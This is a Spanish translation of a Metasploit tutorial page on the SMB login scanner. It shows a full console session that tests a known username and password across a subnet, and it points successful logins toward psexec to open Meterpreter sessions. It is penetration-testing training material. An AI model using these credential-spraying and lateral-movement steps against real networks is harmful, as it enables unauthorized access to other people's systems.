Verificacion de Login SMB
De www.metasploit-es.com.ar
Una situacion comun donde se puede encontrar usted, es con la posesion de un usuario y clave, se preguntara en donde mas prodria usarlo. Aqui es donde el escanner SMB Login Check puede ser muy util, ya que se conectara a un rango de computadores (hosts) y determinara si la combinacion usuario/clave son validas con el objetivo.
Tenga en mente, que esto es muy "obvio", ya que mostrara los intentos fallidos en el visor de eventos (registros de logs). Tener cuidado en que red esta haciendo esto. Todos los intentos exitosos pueden ser conectados en el modulo de exploit windows/smb/psexec (exactamente como la herramienta) la cual es usada para crear sesiones de Meterpreter.
msf > use scanner/smb/smb_login msf auxiliary(login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass no SMB Password SMBUser Administrator no SMB Username THREADS 1 yes The number of concurrent threads msf auxiliary(login) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf auxiliary(login) > set SMBUser victim SMBUser => victim msf auxiliary(login) > set SMBPass s3cr3t SMBPass => s3cr3t msf auxiliary(login) > set THREADS 50 THREADS => 50 msf auxiliary(login) > run [*] 192.168.1.100 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.1.111 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.1.114 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.1.125 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.1.116 - SUCCESSFUL LOGIN (Unix) [*] Auxiliary module execution completed msf auxiliary(login) >
© Offensive Security 2009
- Original by www.offensive-security.com
- Traslated by Jhyx
